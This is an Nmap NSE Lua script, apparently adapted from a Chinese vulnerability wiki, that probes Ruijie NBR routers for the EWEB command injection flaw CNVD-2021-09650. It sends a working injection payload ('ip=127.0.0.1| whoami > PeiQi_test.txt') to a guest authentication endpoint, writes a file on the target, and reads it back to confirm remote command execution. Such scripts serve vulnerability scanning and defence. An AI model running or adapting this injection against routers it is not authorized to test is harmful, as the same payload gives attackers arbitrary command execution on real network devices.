---
--- Generated by EmmyLua(https://github.com/EmmyLua)
--- Created by shine_clown.
--- DateTime: 2021/5/22 10:00
--- 原创作者:
--- peiqi文库
--- 原创作者地址:
--- url:http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%E8%B7%AF%E7%94%B1%E5%99%A8%20EWEB%E7%BD%91%E7%AE%A1%E7%B3%BB%E7%BB%9F%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CNVD-2021-09650.html?h=%E9%94%90%E6%8D%B7
--- nmap --script CNVD-2021-09650 -sV <host>
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"

description = [[锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 CNVD-2021-09650
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入，导致远程命令执行获取权限]]

author = "shine_clown"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default"}

portrule = function(host, port)
  return shortport.ssl(host, port) and "https" or "http"
end


action = function(host, port)
    local output = stdnse.output_table()
    local path = "/guest_auth/guestIsUp.php"
    local data = "mac=1&ip=127.0.0.1| whoami > PeiQi_test.txt"
    local vuln_url = "/guest_auth/PeiQi_test.txt"
    local response = http.post(host, port, path, {header = {["Content-Type"] = "application/x-www-form-urlencoded"}}, nil, data)
    local response = http.get(host, port, vuln_url)
    if response and response.status == 200 then
        output = "[+] Found Vulnerable,address://host,port/guest_auth/PeiQi_test.txt"
    else
        output = "[-] Not Found Vulnerable"
    end
    return output
end
